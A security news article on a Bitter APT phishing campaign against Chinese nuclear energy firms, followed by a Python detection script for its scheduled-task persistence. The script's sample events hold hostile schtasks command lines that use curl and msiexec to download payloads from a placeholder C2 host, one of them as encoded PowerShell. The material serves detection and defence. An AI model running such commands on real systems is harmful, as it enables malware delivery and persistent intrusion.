A notorious APT espionage group that typically targets the energy and government sectors in South and Southeast Asia has recently launched new campaigns aimed at critical organizations in China.
The group’s tactics, techniques, and procedures (TTPs) align with previous attacks and involve phishing emails containing Excel and Compiled HTML Help (CHM) attachments.
Picking out nuclear energy firms
According to Intezer researchers, a recent attack on various nuclear energy companies and academics in China begins with a fraudulent email. The email claims to have been sent by the Embassy of Kyrgyzstan in Beijing and invites recipients to a nuclear energy-related conference.
The conference is allegedly held by the International Atomic Energy Agency (IAEA), the China Institute of International Studies (CIIS), and the Kyrgyz Embassy. To make the email appear legitimate, it includes:
- The names of genuine officials from the Kyrgyzstan Ministry of Foreign Affairs
- Instructions to download a RAR file containing an invitation card for the conference
- Malicious links leading to either an infected Excel file or a CHM file
“We identified seven emails pretending to be from the Embassy of Kyrgyzstan being sent to recipients in the nuclear energy industry in China. In some emails related to nuclear energy, people and entities in academia are also targeted. The phishing emails contain a lure that invites the recipients to join conferences on subjects that are relevant to them.”
Modus operandi: molded attack
- The Excel or CHM files used in the attack aim to establish a persistent presence and download additional payloads onto the compromised system.
- The Excel file harbors an exploit for Equation Editor. Upon execution, it creates two scheduled tasks that run every 15 minutes and employs curl to download the next EXE payload.
- CHM files are leveraged to execute arbitrary code. They also create a scheduled task that runs msiexec to acquire a remote MSI payload from the command and control (C2) server and execute it.
- In one version of the CHM file payload, encoded PowerShell commands are used to create the same scheduled task and conceal the activity.
Although the actual payload used for the second-stage attack could not be captured, it is believed to be keyloggers, info-stealers, or remote access Trojans, which have been used in previous attacks by the Bitter APT group.
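The persistence chain described above (a scheduled task repeating every 15 minutes whose action fetches a remote payload with curl or msiexec, sometimes created through encoded PowerShell) translates directly into a detection rule. The following is an added example, not code from the report or from Intezer; the process-creation events, task names and URL are constructed placeholders.

```python
import base64
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style).
# The c2.example.invalid URL is a placeholder, not an indicator from the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 15 /tn Update /tr "curl.exe -o %TEMP%\p.exe http://c2.example.invalid/p"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 15 /tn Sync /tr "msiexec /i http://c2.example.invalid/p.msi /q"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc " + base64.b64encode(
         'schtasks /create /sc minute /mo 15 /tn Svc /tr "msiexec /i http://c2.example.invalid/x.msi /q"'.encode("utf-16-le")).decode()},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc daily /tn Backup /tr "C:\Tools\backup.exe"'},  # benign
]

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
MINUTE_TASK = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.I)
REMOTE_FETCH = re.compile(r"\b(curl(?:\.exe)?|msiexec(?:\.exe)?)\b.*https?://", re.I)

def decode_powershell(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or the command line unchanged."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline

def classify(event):
    """Return the reasons an event matches the persistence pattern (empty list = no match)."""
    reasons = []
    cmd = decode_powershell(event["CommandLine"])
    if cmd != event["CommandLine"]:
        reasons.append("encoded PowerShell")
    if "schtasks" in cmd.lower() and "/create" in cmd.lower():
        m = MINUTE_TASK.search(cmd)
        if m and int(m.group(1)) <= 15:       # short repeat interval, as in the report
            reasons.append(f"task repeats every {m.group(1)} minutes")
        if REMOTE_FETCH.search(cmd):          # curl/msiexec pulling from an http(s) URL
            reasons.append("task action fetches a remote payload")
    return reasons

def scan(events):
    """Return (index, reasons) for every event that triggers at least one rule."""
    hits = []
    for i, e in enumerate(events):
        reasons = classify(e)
        if reasons:
            hits.append((i, reasons))
    return hits
```

Run against real Sysmon or Security 4688 exports, the same rules flag the task-creation step rather than the later payload, which is useful because the second-stage binary was not recovered.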
Concluding subsequent plan of action
Bitter APT has relied on similar tactics for years and has repeatedly targeted nuclear power organizations across the Asia-Pacific region. Knowing its playbook is the best way to avoid becoming its next victim.
Links from unknown senders should be validated before they are opened. CHM files are rarely used in legitimate business correspondence, so attachments of that type should be blocked or avoided. Being proactive is the best strategy for defending against these threats.